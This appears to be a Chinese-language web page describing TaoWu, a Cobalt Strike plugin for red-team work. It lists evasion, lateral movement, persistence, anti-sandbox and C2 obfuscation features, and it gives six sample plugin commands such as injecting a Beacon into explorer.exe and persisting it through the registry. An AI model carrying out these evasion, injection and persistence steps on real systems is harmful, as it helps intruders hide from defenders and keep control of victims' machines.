梼杌(TaoWu)CS 插件介绍

梼杌(TaoWu) 是一款 Cobalt Strike(CS)插件,主要用于 免杀、横向渗透、权限维持、后渗透控制。该插件名称源自中国古代四凶之一“梼杌”,寓意 强大、隐蔽、难以对抗,适用于 高级渗透测试和红队对抗

TaoWu 主要功能

✅ 增强 CS 免杀:提供 动态 Beacon 加载、进程注入、Shellcode 隐藏执行,提升对抗 EDR/XDR 的能力。
✅ 内网横向渗透:支持 SMB、RDP、WMI、WinRM 等多种方式,绕过内网防御机制。
✅ 持久化控制:提供 注册表、服务、计划任务 等持久化方法,确保长期控制目标。
✅ 无文件攻击(Fileless):支持 内存加载 Beacon,避免落地文件,提高隐蔽性。
✅ 反分析 & 反沙盒:检测 虚拟机、沙盒、流量监控,自动终止分析环境中的 Beacon。
✅ 流量混淆:通过 加密通信、协议混淆 规避安全设备检测。
✅ DLL & 进程注入:隐藏 Beacon 进程,提高渗透稳定性。

TaoWu 适用场景

🔹 红队渗透:绕过安全防御,提高隐蔽性和持久控制能力。
🔹 免杀绕过:突破 EDR/XDR,稳定执行 Cobalt Strike Beacon。
🔹 横向渗透:在内网环境中利用 Windows 内置工具进行无文件攻击。
🔹 SOC 对抗:混淆流量,避免被安全监测系统检测。

TaoWu 典型功能使用示例

(1)免杀执行 Beacon(内存加载)

TaoWu load -beacon memory

(2)隐藏 Beacon 进程(注入到合法进程)

TaoWu inject -process explorer.exe -payload beacon.bin

(3)横向移动(SMB 远程命令执行)

TaoWu lateral -smbexec -target 192.168.1.100 -command "whoami"

(4)反沙盒 & 反分析环境

TaoWu evade -sandbox -vm

(5)权限维持(注册表持久化)

TaoWu persist -reg -payload beacon.bin

(6)流量混淆(C2 交互加密)

TaoWu obfuscate -c2 traffic

官方GitHub(作者已不提供下载)

作者已不提供下载

图片详情

声明:本站所有文章,如无特殊说明或标注,均来源与互联网。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。